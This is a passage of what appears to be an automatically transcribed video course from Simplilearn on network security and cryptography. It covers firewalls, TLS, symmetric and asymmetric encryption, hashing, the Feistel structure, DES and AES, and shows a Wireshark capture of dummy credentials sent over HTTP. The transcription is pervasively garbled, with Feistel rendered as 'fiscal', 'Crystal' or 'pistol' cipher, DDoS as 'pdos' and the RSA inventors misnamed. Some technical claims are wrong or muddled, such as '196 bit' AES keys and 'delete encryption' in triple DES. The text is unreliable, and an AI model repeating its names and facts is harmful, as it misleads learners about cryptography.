be vulnerable to attacks if they are not adequately secured data loss theft and sabotages may be decreased with the usage of a strong network security system the workstations are protected from hazardous Fiverr thanks to network security additionally it guarantees the security of the data which is being shared over a network by dividing information into various sections encrypting these portions and transferring them over separate Pathways network security infrastructure offers multiple levels of protection to thwart man in the middle attacks preventing situations like eavesdropping among other harmful attacks it is becoming increasingly difficult in today's hyper-connected environment as more corporate applications migrate to both public and private talks additionally modern applications are also frequently virtualized and dispersed across several locations some outside the physical control of the IT team Network traffic and infrastructure must be protected in these cases since assaults on businesses are increasing every single day we now understood the basics of network security but we need to understand how network security works in the next section in slightly more detail network security revolves around two processes authentication and authorization the first person which is authentication is similar to access path which ensure that only those who have the right to enter a building in other words authentication checks and verifies that it is indeed the user belonging to the network who is trying to access or enter it thereby preventing unauthorized intrusions next comes authorization this process decides the level of access provided to the recently authenticated user for example Network admin needs access to the entire network whereas those working within it probably need access to only certain areas within the network based on the network user's role the process of determining the level of access or permission level is known as authorization today's Network architecture is complex and pieces a threat environment that is always changing and attackers that are always trying to find and exploit vulnerabilities these vulnerabilities can exist in many areas including devices data applications users and locations for this reason many Network Security Management tools and applications are in use today that address individual threats when it's just a few minutes of down times can cause widespread disruption and massive damage to an organization's bottom line and reputation it is essential that these protection measures are in place beforehand now that I know a little about network security and it's working let's compare the different types of network security the fundamental tenet of network security is the layering of protection for massive networks and stored data that ensure the acceptance of rules and regulations and Suppose there are three times the first of which is physical security the next being Technical and the third being administrative let's look into physical security first this is the most basic level that includes protecting data and network to unauthorized Personnel from acquiring control over the confidentiality of the network this include external peripherals and routers that might be used for cable connections the same can be achieved by using devices like biometric systems physical security is critical especially for small businesses that do not have many resources to devote to security personnel and the tools as opposed to large firms when it comes to technical network security it focuses mostly on safeguarding data either kept in the network or engaged in network transitions this kind fulfills two functions one is defense against unauthorized users the other is a difference against manipulate actions the last category is Administrative this level of network security protects user Behavior like how the permission has been granted and how the authorization process takes place this also ensures the level of sophistication the network might need to protect it through all the attacks the syllabus also suggests necessary amendments that have to be done to the infrastructure I think there's all the basics that we need to cover on network security in which our next topic we're going to go through two mediums of network security which are the transport layer and the application layer so transport layer is a way to secure information as it is carried over the Internet with users browsing websites emails instant messaging Etc TLS aims to provide a private and secure connection between a web browser and a website server it does this with the cryptographic handshake between two systems using public key cryptography the two parties to the connected and exchange a secret token and once each machine validates this token it is used for all Communications the connection employs lighter symmetrical cryptography to save bandwidth and processing power since the application layer is the closest layer to the end user it provides hackers with the largest threat surface poor app layer security can lead to Performance and stability issues data theft and in some cases the network being taken down examples of application layer attacks include distributed developed service attacks or pdos attacks HTTP plots SQL injections cross-site scripting Etc most organizations have an arsenal of application layer security protections to combat these and more such as web application firewalls secure web Gateway Services Etc now that you have the theory behind network security has been covered in detail let us go through some of the tools that can be used to enforce these network security policies the first two to be covered in this section is a firewall a firewall is a type of network security device that keeps track of incoming and outgoing Network traffic and it decides which traffic to allow or deny in accordance to a set of security rules for more than 25 years 5 volts have served a network Security's first line of defense they provide a barrier between trustworthy internally protected and regulated networks from Shady external networks like the internet at some points the next two which can be used to bolster network security is a virtual private Network or VPN for sure it's an encrypted connection between a device and a network via the Internet the encrypted connection is the secure transmission of sensitive data it makes it impossible for unauthorized parties to eavesdrop on the traffic and enables remote work for the user the usage of VPN technology is common in both corporate and personal networks next we cover the importance of inclusion prevention systems in network security or IPS Frameworks an intrusion prevention system is a network security tool that continually scans the network for harmful activity and responds to it when it does occur by reporting blocking or discarding it it can be either Hardware or software it's more sophisticated than an inclusion detection system or an IDs framework which can just warn an administrator and merely identify harmful activities while in the case of an IPS it actually takes against that activity the next tool in this section and the final one are going to be behavioral Analytics paper analytics focus more on the statistics that are being carried over and stored through months and years of usage on some kind of similar pattern is noted but the idea administrator can detect some kind of attack the similar attacks can be stopped and the security can be further enhanced another you have covered all that we need to know about network security the necessary tools and different types Etc let's go to the benefits of network security as a phone the first which is protection against external threats the objective for cyber assaults can be as varied as the Defenders themselves although they are typically initiated for financial gain whether they are industrial spies hacktivists or cyber criminals these Bad actors all have one thing in common which is how quick clever can covert the attacks are getting a strong cyber security posture that considers routine software updates May assist Works in identifying and responding to the abuse techniques tools and the common entry points the next benefit is protection against internal drugs the human aspect continues to be the cyber security system's weakest link inside the risk can originate from current or former workers third party vendors or even trusted partners and they can be unintentional careless or downright even aside from that the rapid expansion of remote work and the personal devices used for business purposes while even iot devices in remote locations can make it easier for these kind of threats to go undetected until it's too late however by proactively monitoring networks and managing access these ranges may be identified and dealt with before they become expensive disasters the third benefit is increase productivity it's nearly impossible for employees to function when Network and personal devices are slowed to a crawl by viruses and other cyber attacks during the operation of website and for the company to run you must significantly minimize violations and the amount of downtime required to fix the breach by implementing various cyber security measures such as enhanced firewalls by the scanning and automatic backups employee identification of possible email phishing schemes suspicious links and other malicious criminal activities can also be aided by Education and Training another benefit is brand trust and reputation customer retention is one of the most crucial elements in business development customers today place a premium on maintaining brand loyalty through a strong cyber security stance then this is the fastest way to get other businesses back get referrals and sell more tickets overall additionally it helps manufacturers get on the vendor list with bigger companies as a part of the supply chain which is only as strong as its weakest link this opens possibilities for potential future endeavors and development with the rise in censorship and general fear over privacy loss consumer security is at an all-time high risk technology has made our life so much easier while putting up a decent Target on our personal information it is necessary to understand how to simultaneously Safeguard our data and be up to date with the latest technological developments maintaining this balance has become easier with cryptography taking its place in today's digital world so hey everyone this is Baba from Simply learn and welcome to this video on cryptography but before we begin if you love watching Tech videos subscribe to our Channel and hit the Bell icon to never miss an update from Simply learn so here's a story to help you understand cryptography meet Anne Anne wanted to look for a decent discount on the latest iPhone she started searching on the internet and found a rather Shady website that offered a 50 discount on the first purchase once and submitted her payment details a huge chunk of money was withdrawn from a bank account just moments after devastated and quickly realized she had failed to notice that the website was their HTTP webpage instead of an https one the payment information submitted was not encrypted and it was visible to anyone keeping an eye including the website owner and hackers Hatcher used a reputed website which has encrypted transactions and employs cryptography our iPhone enthusiasts could have avoided this particular incident this is why it's never recommended to visit unknown websites or share any personal information on them now that we understand why cryptography is so important let's take a look at the topics to be covered today we take a look into what cryptography is and how it works we learn where cryptography is being used in our daily lives and how we are benefiting from it then we will understand the different types of cryptography and their respective users moving on we will look at the usage of cryptography in ancient history and a live demonstration of cryptography and encryption in action let's Now understand what cryptography is cryptography is the science of encrypting or decrypting information to prevent unauthorized access we transform our data and personal information so that only the correct recipient can understand the message as an essential aspect of modern data security using cryptography allows the Secure Storage and transmission of data between willing parties encryption is a primary route for employing cryptography by adding certain algorithms to Jumble up the data decryption is the process of reversing the work done by encrypting information so that the data becomes readable again both of these methods form the basis of cryptography for example when simply run is jumbled up or changed in any format not many people can guess the original word by looking at the encrypted text the only ones who can are the people who know how to decrypt the coded word thereby reversing the process of encryption any data pre-encryption is called plain text or clear text to encrypt the message we use certain algorithms that serve a single purpose of scrambling the data to make them unreadable without the necessary tools these algorithms are called ciphers they are a set of detailed steps to be carried out one after the other to make sure the data becomes as unreadable as possible until it reaches the receiver we take the plain text pass it to the cipher algorithm and get the encrypted data this encrypted text is called the ciphertext and this is the message that is transferred between the two parties the key that is being used to scramble the data is known as the encryption key these steps that is the cipher and the encryption key are made known to the receiver who can then reverse the encryption on receiving the message unless any third party manages to find out both the algorithm and the secret key that is being used they cannot decrypt the messages since both of them are necessary to unlock the hidden content wonder what else we would lose if not for cryptography any website where you have an account can read your passwords important emails can be intercepted and their contents can be read without encryption during the transit more than 65 billion messages are sent on WhatsApp every day all of which are secured thanks to end-to-end encryption there is a huge Market opening up for cryptocurrency which is possible due to blockchain technology that uses encryption algorithms and hashing functions to ensure that the data is secure if this is of particular interest to you you can watch our video on blockchain the link of which will be in the description of course there is no single solution to a problem as diverse as explained there are three variants of how cryptography works and is in practice they are symmetric encryption asymmetric encryption and hashing let's find out how much you have understood until now do you remember the difference between a cipher and ciphertext leave your answers in the comments and before we proceed if you find this video interesting make sure to give it a thumbs up before moving ahead let's look at symmetric encryption first symmetric encryption uses a single key for both the encryption and decryption of data it is comparatively less secure than asymmetric encryption but much faster it is a compromise that has to be embraced in order to deliver data as fast as possible without leaving information completely vulnerable this type of encryption is used when data rests on servers and identifies Personnel for payment applications and services the potential drawback with symmetric encryption is that both the sender and receiver need to have the same secret key and it should be kept hidden at all times Caesar Cipher Enigma machine are both symmetric encryption examples that we will look into further for example if Alice wants to send a message to Bob she can apply a substitution Cipher or a shift Cipher to encrypt the message but Bob must be aware of the same key itself so he can decrypt it when he finds it necessary to read the entire message symmetric encryption uses one of the two types of ciphers stream ciphers and block ciphers block ciphers break the plain text into blocks of fixed size and use the key to convert it into ciphertext stream ciphers convert the plain text into ciphertext one bit at a time instead of resorting to breaking them up into bigger chunks in today's world the most widely used symmetric encryption algorithm is AES 256 that stands for advanced encryption standard which has a key size of 256 bit with 128-bit and 196 bit key sizes also being available other primitive algorithms like the data encryption standard that is the Des the triple data encryption standard 3des and Blowfish have all fallen out of favor due to the rise of AES AES chops UPS the data into blocks and performs 10 plus rounds of obscuring and substituting the message to make it unreadable asymmetric encryption on the other hand has a double whammy at its disposal there are two different keys at play here a public key and a private key the public key is used to encrypt information pre-transit and a private key is used to decrypt the information post Transit if Alice wants to communicate with Bob using asymmetric encryption she encrypts the message using Bob's public key after receiving the message Bob uses his own private key to decrypt the data this way nobody can intercept the message in between transmissions and there is no need for any secure key exchange for this to work since the encryption is done with the public key and the decryption is another private key that no one except Bob has access to both the keys are necessary to read the full message there is also a reverse scenario where we can use the private key for encryption and the public key for decryption a server can sign non-confidential information using its private key and anyone who has its public key can decrypt the message this mechanism also proves that the sender is authenticated and there is no problem with the origin of the information RSA encryption is the most widely used asymmetric encryption standard it is named after its Founders West Shamir and Edelman and it uses block ciphers that separate the data into blocks and obscure the information widely considered the most secure form of encryption albeit relatively slower than EES it is widely used in web browsing secure identification vpns emails and chat applications with so much hanging on the key secrecy there must be a way to transmit the keys without others reading our private data many systems use a combination of symmetric encryption and asymmetric encryption to bolster security and match speed at the same time since asymmetric encryption takes longer to decrypt large amounts of data the full information is encrypted using a single key that is symmetric encryption that single key is then transmitted to the receiver using asymmetric encryption so you don't have to compromise either way another route is using the diffie-helpman key exchange which relies on a one-way function and is much tougher to break into the third variant of cryptography is termed as hashing hashing is the process of scrambling a piece of data beyond recognition it gives an output of fixed size which is known as the hash value of the original data or just hash in general the calculations that do the job of messing up the data collection form the hash function they are generally not reversible without resilient Brute Force mechanisms and are very helpful when storing data on website servers that need not be stored in plain text for example many websites store your account passwords in a hashed format so that not even the administrator can read your credentials when a user tries to log in they can compare the entered passwords hash value with the hash value that is already stored on the servers for authentication since the function will always return the same value for the same input cryptography has been in practice for centuries Julius Caesar used a substitution shift to move alphabets a certain number of spaces beyond their place in the alphabet table a spy can't decipher the original message at first glance for example if he wanted to pass confidential information to his armies and decides to use the substitution shift of plus 2 a becomes c b becomes D and so on the word attack when passed through a substitution shift of plus 3 becomes dww d f n this Cipher has been appropriately named the Caesar Cipher which is one of the most widely used algorithms the Enigma is probably the most famous cryptographic Cipher device used in ancient history it was used by the Nazi German armies when the world wars they were used to protect confidential political military and administrative information and it consisted of three or more rotors that scrambled the original message depending on the machine's State at that time the decryption is similar but it needs both machines to stay in the same state before passing the ciphertext so that we received the same plain text message let's take a look at how our data is protected while we browse the internet thanks to cryptography here we have a web-based tool that will help us understand the process of RSA encryption we see the entire workflow from selecting the key size to be used until the decryption of the cipher text in order to get the plain text back as we already know RSA encryption algorithm falls under the umbrella of asymmetrically cryptography that basically implies that we have two keys at play here a public key and a private key typically the public key is used by the sender to encrypt the message and the private key is used by the receiver to decrypt the message there are some occasions when this allocation is reversed and we will have a look at them as well in RSA we have the choice of key size we can select any key from our 512 bit to 1024 bit all the way up to a 4096 bit key the longer the key length the more complex the encryption process becomes and thereby strengthening the ciphertext although with added security more complex functions take longer to perform the same operations on similar size of data we have to keep a balance between both speed and strength because the strongest encryption algorithms are of no use if they cannot be practically deployed in systems around the world let's take a 1024-bit key over here now we need to generate the keys this generation is done by functions that operate on pass freezes the tool we are using right now generates this pseudorandom keys to be used in this explanation once we generate the keys you can see the public key is rather smaller than the private key which is almost always the case these two keys are mathematically linked with each other they cannot be substituted with any other key and in order to encrypt the original message or decrypt the cipher text this pair must be kept together the public key is then sent to the sender and the receiver keeps the private key with himself in this scenario let's try an encrypt the word simply learn we have to select if the key being used for encryption is either private or public since that affects the process of scrambling the information since we are using the public key over here let's select the same and copy it and paste over here okay the cipher we are using right now is plain RSA there are some modified ciphers with their own pros and cons that can also be used provided we use it on a regular basis and depending on the use case as well once you click on encrypt we can see the ciphertext being generated over here the pseudorandom generating functions are created in such a way that a single character change in the plain text will trigger a completely different ciphertext this is a security feature to strengthen the process from Brute Force methods now that we are done with the encryption process let's take a look at the decryption part the receiver gets this ciphertext from the sender with no other key or supplement he or she must already possess the private key generated from the same pair no other private key can be used to decrypt the message since they are mathematically linked we paste the private key here and select the same the cipher must always so be the same used during the encryption process once you click decrypt you can see the original plain text we had decided to encrypt this sums up the entire process of RSA encryption and decryption now some people use it the other way around we also have the option of using the private key to encrypt information and the public key to decrypt it this is done mostly to validate the origin of the message since the keys only work in pairs if a different private key is used to encrypt the message the public key cannot decrypt it conversely if the public key is able to decrypt the message it must have been encrypted with the right private key and hence the rightful owner here we just have to take the private key and use that to encrypt the plain text and select the same in this checkbox as well you can see we have generated a completely new Cipher text this ciphertext will be sent to the receiver and this time we will use the public key for decryption let's select the correct checkbox and decrypt and we still get the same output now let's take a look at practical example of encryption in the real world we all use the internet on a daily basis and many are aware of the implications of using unsafe websites let's take a look at Wikipedia here pretty standard https website where the edge stands for secured let's take a look at how it secures the data Wireshark is the world's foremost and most widely used Network protocol analyzer it lets you see what's happening on your network at a microscopic level and we are going to use the software to see the traffic that is leaving our machine and to understand how vulnerable it is since there are many applications running in this machine let's apply a filter that will only show us the results related to Wikipedia [Music] let's search for something that we can navigate the website with okay once we get into it a little you can see some of the requests being populated over here let's take a look at the specific request these are the data packets that basically transport the data from our machine to the internet and vice versa as you can see there's a bunch of gibberish data here that doesn't really reveal anything that we searched or watched similarly other secured websites function the same way and it is very difficult if at all possible to Snoop on user data this way to put this in perspective let's take a look at another website which is a HTTP web page foreign enabled from the server end which makes it vulnerable to attacks there is a login form here which needs legitimate user credentials in order to Grant access let's enter a random pair of credentials these obviously won't work but we can see the manner of data's transfer unsurprisingly we weren't able to get into the platform instead we can see the data packets let's apply a similar filter that will help us understand what request this website is sending these are the requests being sent by the HTTP login form to the internet if we check here see whatever username and password that we are entering we can easily see it with the Wireshark now we used a dummy pair of credentials if we select the right data packet we can find our current credentials if any website had asked for a payment information or a legitimate credentials it have been really easy to get a hold of these to reiterate what we have already learned we must always avoid HTTP websites and just unknown or not trustworthy websites in general because the problem we saw here is just the tip of the iceberg even though cryptography has managed to lessen the risk of cyber attacks it is still prevalent and we should always be alert to keep ourselves safe online there are two types of encryption in cryptography symmetric key cryptography and asymmetric key cryptography both of these categories have their pros and cons and differ only by the implementation today we are going to focus exclusively on symmetric key cryptography let us have a look at its applications in order to understand its importance better this variant of cryptography is primarily used in banking applications where personally identifiable information needs to be encrypted with so many aspects of banking moving on to the internet having a reliable safety net is crucial symmetric cryptography helps in detecting bank fraud and boosts the security index of these payment gateways in general they are also helpful in protecting data that is not in transit and rests on servers and data centers these centers house a massive amount of data that needs to be encrypted with a fast and efficient algorithm so that when the data needs to be recalled by the respective service there is the Assurance of minor to no delay while browsing the internet we need symmetric encryption to browse secure https websites so that we get an all-around protection it plays a significant role in verifying website server authenticity exchanging the necessary encryption Keys required and generating a session using those keys to ensure maximum security this helps us in preventing the rather insecure HTTP website format so let us understand how symmetric key cryptography works first before moving on to the specific algorithms symmetric key cryptography relies on a single key for the encryption and decryption of information both the sender and receiver of the message need to have a pre-shared secret key that they will use to convert the plain text into ciphertext and vice versa as you can see in the image the key used for encryption is the same key needed for decrypting the message at the other end the secret key shouldn't be sent along with the ciphertext to the receiver because that would defeat the entire purpose of using cryptography key exchange can be done beforehand using other algorithms like the diffie-hellman key exchange protocol for example for example if Paul wants to send a simple message to Jane they need to have a single encryption key that both of them must give secret to prevent snooping on by malicious actors it can be generated by either one of them but must belong to both of them before the messages start flowing suppose the message I am ready is converted into ciphertext using a specific substitution Cipher by Paul in that case Jane must also be aware of the substitution shift to decade the ciphertext once it reaches her irrespective of the scenario where someone manages to grab the ciphertext mid transit to try and read the message not having the secret key renders everyone helpless looking to snow pin the symmetric key algorithms like the data encryption standard have been in use since the 1970s while the popular ones like the AES have become the industry standard today with the entire architecture of symmetric cryptography depending on the single key being used you can understand whites of Paramount importance to keep it secret on all locations the side effect of having a single key for the encryption and decryption is it becomes a single point of failure anyone who gets their hand on it can read all the encrypted messages and do so mainly without the knowledge of the sender and the receiver so it is the priority to keep the encryption and decryption key private at all times should it fall into the wrong hands the third party can send messages to either the sender or the receiver using the same key to encrypt the message upon receiving the message and decrypting it with the key it is impossible to guess its origin if the sender somehow transmits the secret key along with the cipher text anyone can intercept the package and access the information consequently this encryption category is turned private key cryptography since a big part of the data's Integrity is riding on the promise that the users can keep the key secret this terminology contrasts with asymmetry key cryptography which is called public key cryptography because it has two different keys at play one of which is public provided we managed to keep the keys secret we still have to choose what kind of ciphers we want to use to encrypt this information in symmetric key cryptography there are broadly two categories of ciphers that we can employ let us have a look stream ciphers are the algorithms that anchor basic information one bit at a time it can change depending on the algorithm being used but usually it relies on a single bit or byte to do the encryption this is the relatively quicker alternative considering the algorithm doesn't have to deal with blocks of data at a single time every piece of data that goes into the encryption can and needs to be converted into binary format in stream ciphers each binary digit is encrypted one after the other the most popular ones are the rc4 salsa and Panama the binary data is passed through an encryption key which is a randomly generated bitstream upon passing it through we receive the ciphertext that can be transferred to the receiver without fear of man in the middle attacks the binary data can be passed through an algorithmic function it can have either X or operations as it is most of the time or any other mathematical calculations that have the singular purpose of scrambling the data the encryption key is generated using the random bitstream generator and attacks as a supplement in the algorithmic function the output is in binary form which is then converted into the decimal or hexadecimal format to give our final Cipher text on the other hand block ciphers dissect the raw information into chunks of data of fixed size the size of these blocks depend on the exact Cipher being used a 128-bit block Cipher will break the plain text into blocks of 128 bit each and encrypt those blocks instead of a single digit once these blocks are encrypted individually they are chained together to form a final ciphertext block ciphers are much slower but they are more tamper-proof and are used in some of the most widely used algorithms employed today just like stream ciphers the original cyber text is converted into binary format before beginning the process once the conversion is complete the blocks are passed to the encryption algorithm along with the encryption key this would provide us with the encrypted blocks of binary data once these blocks are combined we get a final binary string this string is then converted into hexadecimal format to get a ciphertext today the most popular symmetry key algorithms like AES des and 3des are all block Cipher methodology subsets with so many factors coming into play there are quite a few things symmetrically cryptography excels at while falling short in some other symmetrical cryptography is much faster variant when compared to asymmetric cryptography there is only one key in play unlike a symmetric encryption and this drastically improves calculation speed in the encryption and decryption similarly the performance of symmetric encryption is much more efficient under similar computational limitations fewer calculations help in better memory management for the whole system bulk amounts of data that need to be encrypted are very well suited for symmetric algorithms since they are much quicker handling large amounts of data is simple and easy to use in servers and data forms this helps in better latency during data recall and fewer mixed packets thanks to its simple single key structure symmetric key cryptography algorithms are much easier to set up a communication Channel with and offer a much more straightforward maintenance duties once the secret key is transmitted to both the sender and receiver without any prior mishandling the rest of the system aligns easily and everyday Communications becomes easy and secure if the algorithm is applied as per the documentation symmetric algorithms are very robust and can encrypt fast amounts of data with very less overhead Des algorithm stands for data encryption standard it is a symmetric key Cipher that is used to encrypt and recrypt information in a block by block manner each block is encrypted individually and they are later chained together to form our final ciphertext which is then sent to a receiver DS takes the original unaltered piece of data called the plain text in a 64-bit block and it is converted into an encrypted text that is called the ciphertext it uses 48-bit Keys during the encryption process and follows a specific structure called the fiscal Cipher structure during the entire process it is a symmetric key algorithm which means Des can reuse the keys used in the encryption format to decrypt the ciphertext back to the original plain text once the 64-bit blocks are encrypted they can be combined together before being transmitted let's take a look at the origin and the reason the es was founded DS is based on a pistol block Cipher called Lucifer developed in 1971 by IBM cryptography researcher host Fister Des uses 16 rounds of the system structure using a different key for each round it also utilizes a random function with two inputs and provides a single output variable DS becomes the organization's approved encryption standard in November 1976 and was later reaffirmed as a standard in 1983 1988 and finally in 1999 but eventually Des was cracked and it was no longer considered a secure solution for all official routes of communication consequently triple Ds was developed triple Ds is a symmetric key block Cipher that uses a double Ds Cipher encrypt with the first key delete encryption with the second key and encrypt again with a third key there is also a variation of the two keys where the first and second key are duplicate of each other but triple Ds was ultimately deemed too slow for the growing need for fast communication channels and people eventually fell back to using vs for encrypting messages in order to search for a better alternative a public wide competition was organized and help cryptographers develop their own algorithm as a proposal for the next global standard this is where the vindile algorithm came into play and was later credited to be the next Advanced encryption standard for a long time DS was the standard for data encryption for data and security its rule ended in 2002 when finally the advanced encryption standard replaced Des as an acceptable standard following a public competition for a place to understand the structure of a fistral cipher we can use the following image as a reference the block being encrypted is divided into two parts one of which is being passed on to the function while the other part is xored with the function's output the function also uses the encryption key that differs for each individual Raw this keeps going on until the last step until where the right hand side and the left hand side are being swapped here we receive our final ciphertext for the decryption process the entire procedure is reversed starting from the order of the keys to the block sorting if the entire process is repeated in a reverse order we will eventually get back our plane text and this Simplicity helps the speed overall This was later detrimental to the efficiency of the algorithm hence the security was compromised official block Cipher is a structure used to derive many symmetric block ciphers such as Des which as we have discussed in our previous comic Crystal Cipher proposed a structure that implements substitution and permutation alternately so that we can obtain ciphertext from the plain text and vice versa this helps in reducing the redundancy of the program and increases the complexity to combat Brute Force attacks the pistol Cipher is actually based on the Shannon structure that was proposed in 1945 the crystal Cipher is the structure suggested by Horst feistel which was considered to be a backbone while developing many symmetric block ciphers the Shannon structure highlights the implementation of alternate confusion and diffusion and like we already discussed the fistel cipher structure can be completely reversed depending on the data however we must consider the fact that to decrypt the information by reversing the factor structure we will need the exact polynomial functions and the key orders to understand how the blocks are being calculated we take a plane test which is of 64-bit and when that is later divided into two equal half of 32 bit each in this the right half is immediately transferred to the next round to become the new Left half of the second row the right hand is again passed off to a function which uses an encryption key that is unique to each round in the festel cipher whatever the function gives off as an output it is passed on as an xor input with the left half of the initial plain text the next output will become the right half of the second round for the plain text this entire process constitutes of a single round in the fiscal Cipher taking into account what happens in a polynomial function we take one half of the block and pass it through an expansion box the work of the expansion box is to increase the size of the half from 32-bit to 48-bit text this is done to make the text compatible to a 48-bit keys we have generated beforehand once we pass it through the xor function we get a 48-bit text as an output now remember a half should be of 32-bit so this 48-bit output is then later passed on to a substitution box this substitution box reduces its size from 48 bit to 32-bit output which is then later xor with the first half of the plain text a block Cipher is considered the safest if the size of the block is large but large block sizes can also slow down encryption speed and the decryption speed generally the size is 64-bit sometimes modern block ciphers like AES have a 128-bit block size as well the security of the block server increases with increasing key size but larger key sizes may also reduce the speeds of the process earlier 64-bit keys were considered sufficient modern ciphers need to use 128-bit Keys due to the increasing complexity of today's computational standards the increasing number of rounds also increase the security of the block Cipher similarly they are inversely proportional to the speed of encryption a highly complex round function enhances the security of the block Cipher always we must maintain a balance between the speed and security the symmetric block Cipher is implemented in a software application to achieve better execution speed there is no use of an algorithm if it cannot be implemented in a real life framework that can help organizations to encrypt or decrypt the data in a timely manner now that we understand the basics of pistol ciphers we can take a look at how Des manages to run through 16 rounds of the structure and provide the ciphertext at the end now that we understand the basics of Crystal ciphers we can take a look at how Des manages to run through 16 rounds of this structure and provide a ciphertext in simple terms DS takes the 64-bit plain text and converts it into a 64-bit ciphertext and since we are talking about asymmetric algorithms the same key is being used when it is decrypting the data as well we first take a 64-bit key play in text and we pass it through an initial permutation function the nutritional permission function has the job of dividing the block into two different parts so that we can perform crystals Cipher structures on it there are multiple rounds being procured in the DS algorithm namely 16 rounds of pistol Cipher structure each of these rounds will need keys initially we take a 56-bit cipher key but it is a single key we pass it onto our round key generators which generates 16 different keys for each single round that the fiscal Cipher is being run these keys are passed on to the rounds as 48 bits the size of these 48 bits case is the reason we use the substitution and permutation Bonds in the polynomial functions of the special ciphers when passing through all these rounds we reach round 16 where the final key is passed on from the round key generator and we get a final permutation in the final permutation the Rhymes are swapped and we get a final Cipher text this is the entire process of Des with 16 rounds of Crystal ciphers and compost in it to decrypt a ciphertext back to the plain text we just have to reverse the process we did in the Des algorithm and reverse the key order along with the functions this kind of Simplicity is what gave Des the bonus when it comes to speed but eventually it was detrimental to the overall efficiency of the program when it comes to security factors Des have five different modes of operation to choose from this one of those is electronic code book each 64-bit block is encrypted and decrypted independently in the electronic code book format we also have Cipher blockchaining or the CBC method here each 64-bit block depends on the previous one and all of them use an initialization vector we have a cipher feedback block mechanism where the preceding ciphertext becomes the input for the encryption algorithm it produces a pseudo random output which in turn is xored with the plain text there is an output feedback method as well which is the same as Cipher feedback except that the encryption algorithm input is the output from the preceding Des counter method has a different way of approach where each plain text block is xored with an encrypted counter the counter is then incremented for each subsequent block there are a few other alternatives to these modes of operation but the five mentioned above are the most widely used in the industry and recommended by cryptographers worldwide let's take a look at the future of Tes the dominance of Des ended in 2002 when the advanced encryption standard replaced the DS encryption algorithm as the accepted standard it was done by following a public competition to find a replacement nist officially withdrew the global acceptance standard in May 2005 although triple Des is approved for some sensitive government information through 2030. an ISD also had to change the DS algorithm because its key length was too short given the increased processing power of the new computers encryption power is related to the size of the queue and Bs found itself a victim of ongoing technological advances in Computing we have received a point where 56-bit was no longer a challenge to the computers of packing note that because Des is no longer the nist federal standard does not mean that it is no longer in use triple Ds is still used today and is still considered a legacy encryption algorithm to get a better understanding of how these keys in ciphertext look like we can use an online tool for our benefit as we already know to encrypt any kind of data a key is mandatory this key can be generated using mathematical functions or computerized key generation program such as this website offers it can be based on any piece of text let's say the word is simply learn in our example once the key is settled we provide the plain text or the clear text that needs to be encrypted using the aforementioned key suppose a sentence for this example is this is my first message we have satisfied two prerequisites the message and the key another variable that goes into play is the mode of operation we have already learned about five different modes of operation while we can see some other options here as well let us go with the CBC variant which basically means the cipher blockchaining method one of cbc's key characteristics is that it uses a chaining process it causes the decryption of a block of ciphertext to depend all on the preceding ciphertext blocks as a result the entire validity of all the blocks is contained in the previous adjacent blocks as well a single bit error in a ciphertext block affects the decryption of all the subsequent blocks rearrangement of the order of these for example can cause the decryption process to get corrupted regarding the manner of displaying binary information we have two options here we can either go with base64 or the hexadecimal format let's go with the base64 right now as you can see the cipher text is readily available b64 is a little more efficient than heads so we will be getting a smaller ciphertext when it comes to base64. albeit the size of both the formats should be the same the hex has a longer ciphertext since base64 takes four characters for every three bytes while hex will take two characters for each byte hence base64 turns out to be more efficient now to decrypt the ciphertext we go by the same format we choose base64 we copy the ciphertext onto a decryption tool and we have to make sure that the key we are using is exactly the same we choose similar more of operation and we choose the correct encoding format as well which is base64 in this case as you can see the decryption is complete and we get our plain text back even if you keep everything the same but we just change the encoding format it will not be able to decrypt anything unfortunately DS has become rather easy to crack even without the help of a key the advanced encryption standard is still on top when it comes to symmetric encryption security and will likely stay there for a while eventually with so much computing power growth the need for a stronger algorithm was necessary to safeguard a personal data as solid as Des was the computers of today could easily break the encryption with repeated attempts therefore rendering the data security helpless to counter this dilemma a new standard was introduced which was termed as the advanced encryption standard or the AES algorithm let's learn what is Advanced encryption standard the AES algorithm also known as the redial algorithm is a symmetric block Cipher with a block size of 128 bits it is converted into ciphertext using keys of 128 192 or 256 bits it is implemented in software and Hardware throughout the world to encrypt sensitive data the National Institute of Standards and Technology also known as nist started development on AES in 1997 when it was announced the need for an alternative to the data encryption standard the new internet needed a replacement for Des because of its small key size with increasing computing power it was considered unsafe against entire key search attacks the triple Ds was designed to overcome this problem however it was deemed to be too slow to be deployed in machines worldwide strong cases were present by the Mars rc6 Serpent and the two fish algorithms but it was the rindel encryption algorithm also known as AES which was eventually chosen as the standard symmetric key encryption algorithm to be used its selection was formalized with the release of federal information processing standards publication 197 and the November of 2001. it was approved by the U.S Secretary of Commerce now that we understand the origin of AES let us have a look at the features that make AES encryption algorithm unique the AES algorithm uses a substitution permutation or SP Network it consists of multiple rounds to produce a ciphertext it has a series of linked operations including replacing inputs with specific outputs that is substitutions and others that involve bit shuffling which is permutations at the beginning of the encryption process we only start out with a single key which can be either a 128 bit key a 192-bit key or a 256-bit key eventually this one key is expanded to be used in multiple rounds throughout the encryption and the decryption cycle interestingly AES performs all its calculations on byte data instead of bit data as seen in the case of the Des algorithm therefore AES treats 128 bits of a clear text block as 16 bytes the number of rounds during the encryption process depends on the key size that is being used the 128-bit key size 6 is 10 Rounds the 192-bit key size fixes 12 rounds and the 256-bit key holds 14 nodes a round key is required for each of these rounds but since only one key is input into the algorithm the single key needs to be expanded to get the key for each own including the round 0. with so many mathematical calculations going on in the background there are bound to be a lot of steps throughout the procedure let's have a look at the steps followed in AES before we move ahead we need to understand how data is being stored during the process of AES encryption everything in the process is stored in a four into four Matrix format this Matrix is also known as a state array and we'll be using these State arrays to transmit data from one step to another and from one round to the next row each round takes straight array as input and gives a straight array as output to be transferred into the next round it is a 16 byte Matrix with each cell representing one byte with each four bytes representing a word so every state array will have a total of four words representing it as we previously discussed we take a single key and expand it to the number of rounds that we need the key to be used in let's say the number of rounds are n then the key has to be expanded to be used with n plus 1 rounds because the first round is the key zero round let's say n is the number of rounds the key is expanded to n plus 1 rounds it is also a state array having four words in its vicinity every key is used for a single round and the first key is used as a round key before any round begins in the very beginning the plain text is captured and passed through an xor function with a round key as a supplement this key can be considered the first key from the N plus 1 expanded set moving on the state array resulting from the above step is passed on to a byte substitution process beyond that there is a provision to shift rows in the state arrays later on the state array is mixed with a constant Matrix to shuffle its column in the mix column segment after which we add the round key for that particular round the last four steps mentioned are part of every single round that the encryption algorithm goes through the state arrays are then passed from one round to the next as an input in the last one however we skip the mix columns portion with the rest of the process remaining unchanged but what are these byte substitution and row shifting processes let's find out regarding each step in more detail in the first step the plain text is stored in a state array and it is xorbed with the K is 0 which is the 